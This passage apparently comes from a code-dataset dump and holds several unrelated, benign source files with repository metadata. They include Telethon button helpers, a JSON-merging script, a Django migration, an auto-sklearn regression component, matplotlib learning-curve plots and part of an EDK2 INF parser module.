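        to exist; the handler name is arbitrary):
            from telethon import events
            @client.on(events.CallbackQuery(data=b'like'))
            async def on_like(event):
                # event.data carries the same bytes given to Button.inline
                await event.answer('Thanks!')
            await client.send_message(chat, 'Rate this', buttons=[
                Button.inline('Like', b'like')
            ])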
"""
if not data:
data = text.encode('utf-8')
elif not isinstance(data, (bytes, bytearray, memoryview)):
data = str(data).encode('utf-8')
if len(data) > 64:
raise ValueError('Too many bytes for the data')
return types.KeyboardButtonCallback(text, data)
@staticmethod
def switch_inline(text, query='', same_peer=False):
"""
Creates a new inline button to switch to inline query.
If `query` is given, it will be the default text to be used
when making the inline query.
If ``same_peer is True`` the inline query will directly be
set under the currently opened chat. Otherwise, the user will
have to select a different dialog to make the query.
When the user clicks this button, after a chat is selected, their
input field will be filled with the username of your bot followed
by the query text, ready to make inline queries.
"""
return types.KeyboardButtonSwitchInline(text, query, same_peer)
@staticmethod
def url(text, url=None):
"""
Creates a new inline button to open the desired URL on click.
If no `url` is given, the `text` will be used as said URL instead.
You cannot detect that the user clicked this button directly.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to open the displayed URL unless
the domain is trusted, and once confirmed the URL will open in their
device.
"""
return types.KeyboardButtonUrl(text, url or text)
@staticmethod
def auth(text, url=None, *, bot=None, write_access=False, fwd_text=None):
"""
Creates a new inline button to authorize the user at the given URL.
You should set the `url` to be on the same domain as the one configured
for the desired `bot` via `@BotFather <https://t.me/BotFather>`_ using
the ``/setdomain`` command.
For more information about letting the user login via Telegram to
a certain domain, see https://core.telegram.org/widgets/login.
If no `url` is specified, it will default to `text`.
Args:
bot (`hints.EntityLike`):
The bot that requires this authorization. By default, this
is the bot that is currently logged in (itself), although
you may pass a different input peer.
.. note::
For now, you cannot use ID or username for this argument.
If you want to use a different bot than the one currently
logged in, you must manually use `client.get_input_entity()
<telethon.client.users.UserMethods.get_input_entity>`.
write_access (`bool`):
Whether write access is required or not.
This is `False` by default (read-only access).
fwd_text (`str`):
The new text to show in the button if the message is
forwarded. By default, the button text will be the same.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to login to the specified domain.
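        For instance (the URL below is a placeholder; it must live on the
        domain configured with ``/setdomain`` for the bot):
            Button.auth('Log in', 'https://example.com/telegram-login',
                        write_access=True)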
"""
return types.InputKeyboardButtonUrlAuth(
text=text,
url=url or text,
bot=utils.get_input_user(bot or types.InputUserSelf()),
request_write_access=write_access,
fwd_text=fwd_text
)
@classmethod
def text(cls, text, *, resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button with the given text.
Args:
resize (`bool`):
If present, the entire keyboard will be reconfigured to
be resized and be smaller if there are not many buttons.
single_use (`bool`):
If present, the entire keyboard will be reconfigured to
be usable only once before it hides itself.
selective (`bool`):
If present, the entire keyboard will be reconfigured to
be "selective". The keyboard will be shown only to specific
users. It will target users that are @mentioned in the text
of the message or to the sender of the message you reply to.
When the user clicks this button, a text message with the same text
as the button will be sent, and can be handled with `events.NewMessage
<telethon.events.newmessage.NewMessage>`. You cannot distinguish
between a button press and the user typing and sending exactly the
same text on their own.
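        For example, a small one-time reply keyboard (``client`` and ``chat``
        are assumed to exist):
            await client.send_message(chat, 'Coffee or tea?', buttons=[
                [Button.text('Coffee', resize=True, single_use=True),
                 Button.text('Tea', resize=True, single_use=True)]
            ])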
"""
return cls(types.KeyboardButton(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_location(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's location on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their location with the
bot, and if confirmed a message with geo media will be sent.
"""
return cls(types.KeyboardButtonRequestGeoLocation(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_phone(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's phone on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their phone with the
bot, and if confirmed a message with contact media will be sent.
"""
return cls(types.KeyboardButtonRequestPhone(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_poll(cls, text, *, force_quiz=False,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user to create a poll.
If `force_quiz` is `False`, the user will be allowed to choose whether
they want their poll to be a quiz or not. Otherwise, the user will be
forced to create a quiz when creating the poll.
If a poll is a quiz, there will be only one answer that is valid, and
the votes cannot be retracted. Otherwise, users can vote and retract
        the vote, and the poll might be multiple choice.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a screen letting the user create a
poll will be shown, and if they do create one, the poll will be sent.
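        For example, to only allow quiz-style polls:
            Button.request_poll('Create a quiz', force_quiz=True)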
"""
return cls(types.KeyboardButtonRequestPoll(text, quiz=force_quiz),
resize=resize, single_use=single_use, selective=selective)
@staticmethod
def clear():
"""
Clears all keyboard buttons after sending a message with this markup.
When used, no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardHide()
@staticmethod
def force_reply():
"""
Forces a reply to the message with this markup. If used,
no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardForceReply()
| [] |
addUsername/javaBoring | src/main/resources/pys/join.py | d576adbd21447085f56719e8cc871faf94d8a369 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 20:14:22 2020
Simple script to join json files
@author: SERGI
"""
import json
import sys
import os
def readJson(path):
with open(path, "r") as file:
return json.load(file)
def writeJson(path, dicc):
with open(path, "w") as file:
json.dump(dicc, file)
if __name__ == "__main__":
print("hello from python", flush=True)
jsonPath = str(sys.argv[1])
# =============================================================================
# jsonPath = "../eclipse-workspace/prueba/target/json/"
# =============================================================================
jsonPathTemp = jsonPath+"temp/"
arr = os.listdir(jsonPathTemp)
arr.sort()
print(arr)
dict_to_json = {}
dict_0 = readJson(jsonPathTemp + arr[0])
dict_1 = readJson(jsonPathTemp + arr[1])
dict_2 = readJson(jsonPathTemp + arr[2])
dict_3 = readJson(jsonPathTemp + arr[3])
keys = [name for name in dict_0.keys() if "0" not in name]
for key in keys:
dict_to_json[key] = dict_0[key] + dict_1[key] + dict_2[key] + dict_3[key]
#0seg,f_step,f_stop
seg = dict_0['0seg,f_step,f_stop'][0]
step = dict_0['0seg,f_step,f_stop'][1]
stop = dict_3['0seg,f_step,f_stop'][2]
dict_to_json['0seg,f_step,f_stop'] = [seg, step, stop]
print("Escribiendo json: ", jsonPath+arr[0], flush=True)
writeJson(jsonPath+arr[0], dict_to_json)
print("finish", flush=True) | [((31, 10, 31, 34), 'os.listdir', 'os.listdir', ({(31, 21, 31, 33): 'jsonPathTemp'}, {}), '(jsonPathTemp)', False, 'import os\n'), ((16, 15, 16, 30), 'json.load', 'json.load', ({(16, 25, 16, 29): 'file'}, {}), '(file)', False, 'import json\n'), ((20, 8, 20, 29), 'json.dump', 'json.dump', ({(20, 18, 20, 22): 'dicc', (20, 24, 20, 28): 'file'}, {}), '(dicc, file)', False, 'import json\n')] |
njmhendrix/grand-challenge.org | app/grandchallenge/challenges/migrations/0023_auto_20200123_1102.py | 9bc36f5e26561a78bd405e8ea5e4c0f86c95f011 | # Generated by Django 3.0.2 on 2020-01-23 11:02
import re
import django.contrib.postgres.fields.citext
import django.core.validators
from django.db import migrations
import grandchallenge.challenges.models
class Migration(migrations.Migration):
dependencies = [
("challenges", "0022_auto_20200121_1639"),
]
operations = [
migrations.AlterField(
model_name="challenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
migrations.AlterField(
model_name="externalchallenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
]
| [((29, 24, 29, 56), 're.compile', 're.compile', ({(29, 35, 29, 55): '"""^[-a-zA-Z0-9_]+\\\\Z"""'}, {}), "('^[-a-zA-Z0-9_]+\\\\Z')", False, 'import re\n'), ((47, 24, 47, 56), 're.compile', 're.compile', ({(47, 35, 47, 55): '"""^[-a-zA-Z0-9_]+\\\\Z"""'}, {}), "('^[-a-zA-Z0-9_]+\\\\Z')", False, 'import re\n')] |
hmendozap/master-arbeit-files | autosk_dev_test/component/LinReg.py | 5c1b90bc4a424313234b84bad405799de6f8d2ed | import numpy as np
import scipy.sparse as sp
from HPOlibConfigSpace.configuration_space import ConfigurationSpace
from HPOlibConfigSpace.conditions import EqualsCondition, InCondition
from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, Constant
from autosklearn.pipeline.components.base import AutoSklearnRegressionAlgorithm
from autosklearn.pipeline.constants import *
class LinReg(AutoSklearnRegressionAlgorithm):
def __init__(self, number_updates, batch_size, dropout_output,
learning_rate, solver, lambda2,
momentum=0.99, beta1=0.9, beta2=0.9, rho=0.95,
lr_policy='fixed', gamma=0.01, power=1.0, epoch_step=2,
random_state=None):
self.number_updates = number_updates
self.batch_size = batch_size
self.dropout_output = dropout_output
self.learning_rate = learning_rate
self.lr_policy = lr_policy
self.lambda2 = lambda2
self.momentum = momentum
self.beta1 = 1-beta1 if beta1 is not None else 0.9
self.beta2 = 1-beta2 if beta2 is not None else 0.99
self.rho = rho
self.solver = solver
self.gamma = gamma
self.power = power
self.epoch_step = epoch_step
# Empty features and shape
self.n_features = None
self.input_shape = None
self.m_issparse = False
self.m_isregression = True
self.m_isbinary = False
self.m_ismultilabel = False
self.estimator = None
def _prefit(self, X, y):
self.batch_size = int(self.batch_size)
self.n_features = X.shape[1]
self.input_shape = (self.batch_size, self.n_features)
self.num_output_units = 1 # Regression
# Normalize the output
self.mean_y = np.mean(y)
self.std_y = np.std(y)
y = (y - self.mean_y) / self.std_y
if len(y.shape) == 1:
y = y[:, np.newaxis]
self.m_issparse = sp.issparse(X)
return X, y
def fit(self, X, y):
Xf, yf = self._prefit(X, y)
epoch = (self.number_updates * self.batch_size)//X.shape[0]
number_epochs = min(max(2, epoch), 110) # Cap the max number of possible epochs
from implementation import LogisticRegression
self.estimator = LogisticRegression.LogisticRegression(batch_size=self.batch_size,
input_shape=self.input_shape,
num_output_units=self.num_output_units,
dropout_output=self.dropout_output,
learning_rate=self.learning_rate,
lr_policy=self.lr_policy,
lambda2=self.lambda2,
momentum=self.momentum,
beta1=self.beta1,
beta2=self.beta2,
rho=self.rho,
solver=self.solver,
num_epochs=number_epochs,
gamma=self.gamma,
power=self.power,
epoch_step=self.epoch_step,
is_sparse=self.m_issparse,
is_binary=self.m_isbinary,
is_multilabel=self.m_ismultilabel,
is_regression=self.m_isregression)
self.estimator.fit(Xf, yf)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
preds = self.estimator.predict(X, self.m_issparse)
return preds * self.std_y + self.mean_y
def predict_proba(self, X):
if self.estimator is None:
raise NotImplementedError()
return self.estimator.predict_proba(X, self.m_issparse)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'lin_reg',
'name': 'Linear Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
policy_choices = ['fixed', 'inv', 'exp', 'step']
batch_size = UniformIntegerHyperparameter("batch_size",
100, 3000,
log=True,
default=150)
number_updates = UniformIntegerHyperparameter("number_updates",
500, 10500,
log=True,
default=500)
dropout_output = UniformFloatHyperparameter("dropout_output", 0.0, 0.99,
default=0.5)
lr = UniformFloatHyperparameter("learning_rate", 1e-6, 0.1,
log=True,
default=0.01)
l2 = UniformFloatHyperparameter("lambda2", 1e-6, 1e-2,
log=True,
default=1e-3)
solver = CategoricalHyperparameter(name="solver",
choices=["sgd", "adam"],
default="sgd")
beta1 = UniformFloatHyperparameter("beta1", 1e-4, 0.1,
log=True,
default=0.1)
beta2 = UniformFloatHyperparameter("beta2", 1e-4, 0.1,
log=True,
default=0.01)
lr_policy = CategoricalHyperparameter(name="lr_policy",
choices=policy_choices,
default='fixed')
gamma = UniformFloatHyperparameter(name="gamma",
lower=1e-3, upper=1e-1,
default=1e-2)
power = UniformFloatHyperparameter("power",
0.0, 1.0,
default=0.5)
epoch_step = UniformIntegerHyperparameter("epoch_step",
2, 20,
default=5)
cs = ConfigurationSpace()
cs.add_hyperparameter(number_updates)
cs.add_hyperparameter(batch_size)
cs.add_hyperparameter(dropout_output)
cs.add_hyperparameter(lr)
cs.add_hyperparameter(l2)
cs.add_hyperparameter(solver)
cs.add_hyperparameter(beta1)
cs.add_hyperparameter(beta2)
cs.add_hyperparameter(lr_policy)
cs.add_hyperparameter(gamma)
cs.add_hyperparameter(power)
cs.add_hyperparameter(epoch_step)
beta1_depends_on_solver = EqualsCondition(beta1, solver, "adam")
beta2_depends_on_solver = EqualsCondition(beta2, solver, "adam")
gamma_depends_on_policy = InCondition(child=gamma, parent=lr_policy,
values=['inv', 'exp', 'step'])
power_depends_on_policy = EqualsCondition(power, lr_policy, 'inv')
epoch_step_depends_on_policy = EqualsCondition(epoch_step,
lr_policy, 'step')
cs.add_condition(beta1_depends_on_solver)
cs.add_condition(beta2_depends_on_solver)
cs.add_condition(gamma_depends_on_policy)
cs.add_condition(power_depends_on_policy)
cs.add_condition(epoch_step_depends_on_policy)
return cs
| [((52, 22, 52, 32), 'numpy.mean', 'np.mean', ({(52, 30, 52, 31): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((53, 21, 53, 30), 'numpy.std', 'np.std', ({(53, 28, 53, 29): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((58, 26, 58, 40), 'scipy.sparse.issparse', 'sp.issparse', ({(58, 38, 58, 39): 'X'}, {}), '(X)', True, 'import scipy.sparse as sp\n'), ((70, 25, 89, 97), 'implementation.LogisticRegression.LogisticRegression', 'LogisticRegression.LogisticRegression', (), '', False, 'from implementation import LogisticRegression\n'), ((121, 21, 124, 62), 'HPOlibConfigSpace.hyperparameters.UniformIntegerHyperparameter', 'UniformIntegerHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((126, 25, 129, 66), 'HPOlibConfigSpace.hyperparameters.UniformIntegerHyperparameter', 'UniformIntegerHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((131, 25, 132, 64), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((134, 13, 136, 53), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((138, 13, 140, 53), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((142, 17, 144, 57), 'HPOlibConfigSpace.hyperparameters.CategoricalHyperparameter', 'CategoricalHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((146, 16, 148, 55), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((150, 16, 152, 56), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((154, 20, 156, 62), 'HPOlibConfigSpace.hyperparameters.CategoricalHyperparameter', 'CategoricalHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((158, 16, 160, 56), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((162, 16, 164, 55), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, 
CategoricalHyperparameter, Constant\n'), ((166, 21, 168, 60), 'HPOlibConfigSpace.hyperparameters.UniformIntegerHyperparameter', 'UniformIntegerHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((170, 13, 170, 33), 'HPOlibConfigSpace.configuration_space.ConfigurationSpace', 'ConfigurationSpace', ({}, {}), '()', False, 'from HPOlibConfigSpace.configuration_space import ConfigurationSpace\n'), ((184, 34, 184, 72), 'HPOlibConfigSpace.conditions.EqualsCondition', 'EqualsCondition', ({(184, 50, 184, 55): 'beta1', (184, 57, 184, 63): 'solver', (184, 65, 184, 71): '"""adam"""'}, {}), "(beta1, solver, 'adam')", False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n'), ((185, 34, 185, 72), 'HPOlibConfigSpace.conditions.EqualsCondition', 'EqualsCondition', ({(185, 50, 185, 55): 'beta2', (185, 57, 185, 63): 'solver', (185, 65, 185, 71): '"""adam"""'}, {}), "(beta2, solver, 'adam')", False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n'), ((186, 34, 187, 76), 'HPOlibConfigSpace.conditions.InCondition', 'InCondition', (), '', False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n'), ((188, 34, 188, 74), 'HPOlibConfigSpace.conditions.EqualsCondition', 'EqualsCondition', ({(188, 50, 188, 55): 'power', (188, 57, 188, 66): 'lr_policy', (188, 68, 188, 73): '"""inv"""'}, {}), "(power, lr_policy, 'inv')", False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n'), ((189, 39, 190, 73), 'HPOlibConfigSpace.conditions.EqualsCondition', 'EqualsCondition', ({(189, 55, 189, 65): 'epoch_step', (190, 55, 190, 64): 'lr_policy', (190, 66, 190, 72): '"""step"""'}, {}), "(epoch_step, lr_policy, 'step')", False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n')] |
Elektra-2/python_crash_course_2nd | python_work/Chapter5/exe3_alien_color.py | 1c8beaddfe037faa3a36e7c384a6ea2f9d560060 | # Creating a elif chain
alien_color = 'red'
if alien_color == 'green':
print('Congratulations! You won 5 points!')
elif alien_color == 'yellow':
print('Congratulations! You won 10 points!')
elif alien_color == 'red':
print('Congratulations! You won 15 points!')
| [] |
larryzhang95/Voice-Analysis-Pipeline | DigiPsych_API/Data_Science_API/evaluate_model.py | 264ac5c70d0baab47b81718ea5b895be30a683e9 | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve, validation_curve
# Plot learning curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid(True)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Validation score")
plt.legend(loc="best")
plt.show()
return plt
# Plot validation curve
def plot_validation_curve(estimator, title, X, y, param_name, param_range, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
train_scores, test_scores = validation_curve(estimator, X, y, param_name, param_range, cv)
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
plt.plot(param_range, train_mean, color='r', marker='o', markersize=5, label='Training score')
plt.fill_between(param_range, train_mean + train_std, train_mean - train_std, alpha=0.15, color='r')
plt.plot(param_range, test_mean, color='g', linestyle='--', marker='s', markersize=5, label='Validation score')
plt.fill_between(param_range, test_mean + test_std, test_mean - test_std, alpha=0.15, color='g')
plt.grid(True)
plt.xscale('log')
plt.legend(loc='best')
plt.xlabel('Parameter')
plt.ylabel('Score')
plt.ylim(ylim)
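# Illustrative usage sketch: the digits dataset, the SVC estimator and the gamma
# grid below are arbitrary assumptions, chosen only to show how the two plotting
# helpers can be called.
if __name__ == '__main__':
    from sklearn.datasets import load_digits
    from sklearn.svm import SVC
    X, y = load_digits(return_X_y=True)
    plot_learning_curve(SVC(gamma=0.001), 'SVC learning curve', X, y,
                        cv=5, n_jobs=1)
    plot_validation_curve(SVC(), 'SVC validation curve', X, y,
                          param_name='gamma',
                          param_range=np.logspace(-6, -1, 5),
                          ylim=(0.0, 1.1), cv=5)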
| [((10, 46, 10, 69), 'numpy.linspace', 'np.linspace', ({(10, 58, 10, 60): '(0.1)', (10, 62, 10, 65): '(1.0)', (10, 67, 10, 68): '(5)'}, {}), '(0.1, 1.0, 5)', True, 'import numpy as np\n'), ((11, 4, 11, 16), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((12, 4, 12, 20), 'matplotlib.pyplot.title', 'plt.title', ({(12, 14, 12, 19): 'title'}, {}), '(title)', True, 'import matplotlib.pyplot as plt\n'), ((15, 4, 15, 35), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(15, 15, 15, 34): '"""Training examples"""'}, {}), "('Training examples')", True, 'import matplotlib.pyplot as plt\n'), ((16, 4, 16, 23), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(16, 15, 16, 22): '"""Score"""'}, {}), "('Score')", True, 'import matplotlib.pyplot as plt\n'), ((17, 45, 18, 71), 'sklearn.model_selection.learning_curve', 'learning_curve', (), '', False, 'from sklearn.model_selection import learning_curve\n'), ((19, 24, 19, 53), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((20, 23, 20, 51), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((21, 23, 21, 51), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((22, 22, 22, 49), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((23, 4, 23, 18), 'matplotlib.pyplot.grid', 'plt.grid', ({(23, 13, 23, 17): '(True)'}, {}), '(True)', True, 'import matplotlib.pyplot as plt\n'), ((25, 4, 27, 31), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (), '', True, 'import matplotlib.pyplot as plt\n'), ((28, 4, 29, 78), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (), '', True, 'import matplotlib.pyplot as plt\n'), ((30, 4, 31, 36), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((32, 4, 33, 38), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((35, 4, 35, 26), 'matplotlib.pyplot.legend', 'plt.legend', (), '', True, 'import matplotlib.pyplot as plt\n'), ((36, 4, 36, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((41, 46, 41, 69), 'numpy.linspace', 'np.linspace', ({(41, 58, 41, 60): '(0.1)', (41, 62, 41, 65): '(1.0)', (41, 67, 41, 68): '(5)'}, {}), '(0.1, 1.0, 5)', True, 'import numpy as np\n'), ((43, 17, 43, 46), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((44, 16, 44, 44), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((45, 16, 45, 44), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((46, 15, 46, 42), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((47, 4, 47, 98), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((48, 4, 48, 104), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (), '', True, 'import matplotlib.pyplot as plt\n'), ((49, 4, 49, 115), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((50, 4, 50, 100), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (), '', True, 'import matplotlib.pyplot as plt\n'), ((51, 4, 51, 18), 'matplotlib.pyplot.grid', 'plt.grid', ({(51, 13, 51, 17): '(True)'}, {}), '(True)', True, 'import matplotlib.pyplot as plt\n'), ((52, 4, 52, 21), 'matplotlib.pyplot.xscale', 'plt.xscale', ({(52, 15, 52, 20): '"""log"""'}, {}), "('log')", True, 'import matplotlib.pyplot as plt\n'), ((53, 4, 53, 26), 'matplotlib.pyplot.legend', 'plt.legend', (), '', True, 'import matplotlib.pyplot as plt\n'), ((54, 4, 54, 27), 'matplotlib.pyplot.xlabel', 
'plt.xlabel', ({(54, 15, 54, 26): '"""Parameter"""'}, {}), "('Parameter')", True, 'import matplotlib.pyplot as plt\n'), ((55, 4, 55, 23), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(55, 15, 55, 22): '"""Score"""'}, {}), "('Score')", True, 'import matplotlib.pyplot as plt\n'), ((56, 4, 56, 18), 'matplotlib.pyplot.ylim', 'plt.ylim', ({(56, 13, 56, 17): 'ylim'}, {}), '(ylim)', True, 'import matplotlib.pyplot as plt\n'), ((14, 8, 14, 23), 'matplotlib.pyplot.ylim', 'plt.ylim', ({(14, 17, 14, 22): '*ylim'}, {}), '(*ylim)', True, 'import matplotlib.pyplot as plt\n')] |
sremes/oomi | oomi/__init__.py | 312317aa2ef68f1481b2447652a7d47c5f2e3f56 | """Utilities for downloading comsumption data from Oomi."""
from oomi.oomi_downloader import OomiDownloader, OomiConfig
| [] |
KaoTuz/edk2-stable202108 | BaseTools/Source/Python/UPT/Object/Parser/InfMisc.py | 49d9306e7bf64b2f07d8473be1f2faea49d0a012 | ## @file
# This file is used to define class objects of INF file miscellaneous.
# Include BootMode/HOB/Event and others. It will be consumed by InfParser.
#
# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
'''
InfMisc
'''
import Logger.Log as Logger
from Logger import ToolError
from Library import DataType as DT
from Object.Parser.InfCommonObject import InfSectionCommonDef
from Library.Misc import Sdict
##
# BootModeObject
#
class InfBootModeObject():
def __init__(self):
self.SupportedBootModes = ''
self.HelpString = ''
self.Usage = ''
def SetSupportedBootModes(self, SupportedBootModes):
self.SupportedBootModes = SupportedBootModes
def GetSupportedBootModes(self):
return self.SupportedBootModes
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# EventObject
#
class InfEventObject():
def __init__(self):
self.EventType = ''
self.HelpString = ''
self.Usage = ''
def SetEventType(self, EventType):
self.EventType = EventType
def GetEventType(self):
return self.EventType
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# HobObject
#
class InfHobObject():
def __init__(self):
self.HobType = ''
self.Usage = ''
self.SupArchList = []
self.HelpString = ''
def SetHobType(self, HobType):
self.HobType = HobType
def GetHobType(self):
return self.HobType
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
def SetSupArchList(self, ArchList):
self.SupArchList = ArchList
def GetSupArchList(self):
return self.SupArchList
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
##
# InfSpecialCommentObject
#
class InfSpecialCommentObject(InfSectionCommonDef):
def __init__(self):
self.SpecialComments = Sdict()
InfSectionCommonDef.__init__(self)
def SetSpecialComments(self, SepcialSectionList = None, Type = ''):
if Type == DT.TYPE_HOB_SECTION or \
Type == DT.TYPE_EVENT_SECTION or \
